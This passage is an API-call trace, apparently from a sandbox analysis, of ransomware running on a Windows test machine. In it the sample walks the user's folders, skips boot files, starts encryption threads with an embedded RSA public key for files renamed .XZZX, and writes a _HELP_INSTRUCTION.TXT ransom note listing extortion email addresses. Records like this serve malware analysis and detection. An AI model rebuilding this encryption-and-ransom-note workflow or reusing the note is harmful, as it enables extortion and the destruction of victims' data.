(dwMilliseconds=0x96) [0181.901] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0181.901] lstrcmpW (lpString1="880F5E93248AC126C0E08BB728B7A56E.XZZX", lpString2="..") returned 1 [0181.902] lstrcmpW (lpString1="880F5E93248AC126C0E08BB728B7A56E.XZZX", lpString2=".") returned 1 [0181.902] StrStrW (lpFirst="880F5E93248AC126C0E08BB728B7A56E.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0181.902] StrStrW (lpFirst="880F5E93248AC126C0E08BB728B7A56E.XZZX", lpSrch="ntldr") returned 0x0 [0181.902] StrStrW (lpFirst="880F5E93248AC126C0E08BB728B7A56E.XZZX", lpSrch="NTLDR") returned 0x0 [0181.902] StrStrW (lpFirst="880F5E93248AC126C0E08BB728B7A56E.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0181.902] StrStrW (lpFirst="880F5E93248AC126C0E08BB728B7A56E.XZZX", lpSrch="ntdetect.com") returned 0x0 [0181.902] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 57 [0181.902] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") [0181.902] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0181.902] lstrcpyW (in: lpString1=0x17be7c, lpString2="880F5E93248AC126C0E08BB728B7A56E.XZZX" | out: lpString1="880F5E93248AC126C0E08BB728B7A56E.XZZX") returned="880F5E93248AC126C0E08BB728B7A56E.XZZX" [0181.902] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0181.902] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xb7c [0181.903] Sleep (dwMilliseconds=0x96) [0182.057] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0182.057] lstrcmpW (lpString1="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX", lpString2="..") returned 1 [0182.057] lstrcmpW (lpString1="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX", lpString2=".") returned 1 [0182.057] StrStrW (lpFirst="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0182.057] StrStrW (lpFirst="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX", lpSrch="ntldr") returned 0x0 [0182.057] StrStrW (lpFirst="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX", lpSrch="NTLDR") returned 0x0 [0182.057] StrStrW (lpFirst="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0182.058] StrStrW (lpFirst="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX", lpSrch="ntdetect.com") returned 0x0 [0182.058] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 57 [0182.058] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") [0182.058] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0182.058] lstrcpyW (in: lpString1=0x17be7c, lpString2="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX" | out: lpString1="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX") returned="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX" [0182.058] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0182.058] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xb80 [0182.058] Sleep (dwMilliseconds=0x96) [0182.213] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0182.213] lstrcmpW (lpString1="94764F5B3C2DC73EAED48D494045AB86.XZZX", lpString2="..") returned 1 [0182.213] lstrcmpW (lpString1="94764F5B3C2DC73EAED48D494045AB86.XZZX", lpString2=".") returned 1 [0182.213] StrStrW (lpFirst="94764F5B3C2DC73EAED48D494045AB86.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0182.213] StrStrW (lpFirst="94764F5B3C2DC73EAED48D494045AB86.XZZX", lpSrch="ntldr") returned 0x0 [0182.213] StrStrW (lpFirst="94764F5B3C2DC73EAED48D494045AB86.XZZX", lpSrch="NTLDR") returned 0x0 [0182.213] StrStrW (lpFirst="94764F5B3C2DC73EAED48D494045AB86.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0182.213] StrStrW (lpFirst="94764F5B3C2DC73EAED48D494045AB86.XZZX", lpSrch="ntdetect.com") returned 0x0 [0182.213] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned 57 [0182.214] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") [0182.214] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0182.214] lstrcpyW (in: lpString1=0x17be7c, lpString2="94764F5B3C2DC73EAED48D494045AB86.XZZX" | out: lpString1="94764F5B3C2DC73EAED48D494045AB86.XZZX") returned="94764F5B3C2DC73EAED48D494045AB86.XZZX" [0182.214] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0182.214] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xb84 [0182.214] Sleep (dwMilliseconds=0x96) [0182.369] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0182.369] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0182.369] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0182.369] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0182.369] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0182.369] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 1 [0182.370] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 0 [0182.370] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" [0182.370] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*.*" [0182.370] SetErrorMode (uMode=0x1) returned 0x1 [0182.370] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\_HELP_INSTRUCTION.TXT") returned 74 [0182.370] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0182.371] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0182.371] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0xb88) returned 0x0 [0182.371] RegQueryValueExW (in: hKey=0xb88, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x437d9b8, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x437d9b8*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0182.371] RegCloseKey (hKey=0xb88) returned 0x0 [0182.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0182.371] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0182.371] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb88 [0182.372] CloseHandle (hObject=0xb88) returned 1 [0182.372] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0182.372] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned="MSN Websites" [0182.372] lstrcpyW (in: lpString1=0x17b644, lpString2="MSN Websites" | out: lpString1="MSN Websites") returned="MSN Websites" [0182.372] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0182.372] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0182.372] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0182.372] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0182.372] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0182.372] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0182.372] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0182.372] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0182.372] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0182.372] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0182.372] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0182.372] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0182.372] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 1 [0182.372] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 0 [0182.372] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0182.372] lstrcmpW (lpString1="Windows Live", lpString2="..") returned 1 [0182.372] lstrcmpW (lpString1="Windows Live", lpString2=".") returned 1 [0182.373] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" [0182.373] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0182.373] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="Windows Live" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" [0182.373] SetErrorMode (uMode=0x1) returned 0x1 [0182.373] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" [0182.373] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0182.373] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0182.373] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*.*" [0182.373] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0182.373] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned="Windows Live" [0182.373] lstrcpyW (in: lpString1=0x17b644, lpString2="Windows Live" | out: lpString1="Windows Live") returned="Windows Live" [0182.373] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0182.374] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0182.374] lstrcmpW (lpString1="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX", lpString2="..") returned 1 [0182.374] lstrcmpW (lpString1="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX", lpString2=".") returned 1 [0182.374] StrStrW (lpFirst="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0182.374] StrStrW (lpFirst="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX", lpSrch="ntldr") returned 0x0 [0182.374] StrStrW (lpFirst="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX", lpSrch="NTLDR") returned 0x0 [0182.374] StrStrW (lpFirst="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0182.374] StrStrW (lpFirst="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX", lpSrch="ntdetect.com") returned 0x0 [0182.374] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned 57 [0182.374] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") [0182.374] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0182.374] lstrcpyW (in: lpString1=0x17be7c, lpString2="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX" | out: lpString1="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX") returned="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX" [0182.374] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0182.374] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xb90 [0182.375] Sleep (dwMilliseconds=0x96) [0182.525] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0182.525] lstrcmpW (lpString1="A58916D017654CD0CF379F2B1B923118.XZZX", lpString2="..") returned 1 [0182.525] lstrcmpW (lpString1="A58916D017654CD0CF379F2B1B923118.XZZX", lpString2=".") returned 1 [0182.525] StrStrW (lpFirst="A58916D017654CD0CF379F2B1B923118.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0182.525] StrStrW (lpFirst="A58916D017654CD0CF379F2B1B923118.XZZX", lpSrch="ntldr") returned 0x0 [0182.525] StrStrW (lpFirst="A58916D017654CD0CF379F2B1B923118.XZZX", lpSrch="NTLDR") returned 0x0 [0182.525] StrStrW (lpFirst="A58916D017654CD0CF379F2B1B923118.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0182.525] StrStrW (lpFirst="A58916D017654CD0CF379F2B1B923118.XZZX", lpSrch="ntdetect.com") returned 0x0 [0182.525] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned 57 [0182.525] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") [0182.526] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0182.526] lstrcpyW (in: lpString1=0x17be7c, lpString2="A58916D017654CD0CF379F2B1B923118.XZZX" | out: lpString1="A58916D017654CD0CF379F2B1B923118.XZZX") returned="A58916D017654CD0CF379F2B1B923118.XZZX" [0182.526] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0182.526] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xb94 [0182.526] Sleep (dwMilliseconds=0x96) [0182.682] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0182.682] lstrcmpW (lpString1="D9B986602FBC15FEC37446303428FA46.XZZX", lpString2="..") returned 1 [0182.682] lstrcmpW (lpString1="D9B986602FBC15FEC37446303428FA46.XZZX", lpString2=".") returned 1 [0182.682] StrStrW (lpFirst="D9B986602FBC15FEC37446303428FA46.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0182.682] StrStrW (lpFirst="D9B986602FBC15FEC37446303428FA46.XZZX", lpSrch="ntldr") returned 0x0 [0182.682] StrStrW (lpFirst="D9B986602FBC15FEC37446303428FA46.XZZX", lpSrch="NTLDR") returned 0x0 [0182.682] StrStrW (lpFirst="D9B986602FBC15FEC37446303428FA46.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0182.682] StrStrW 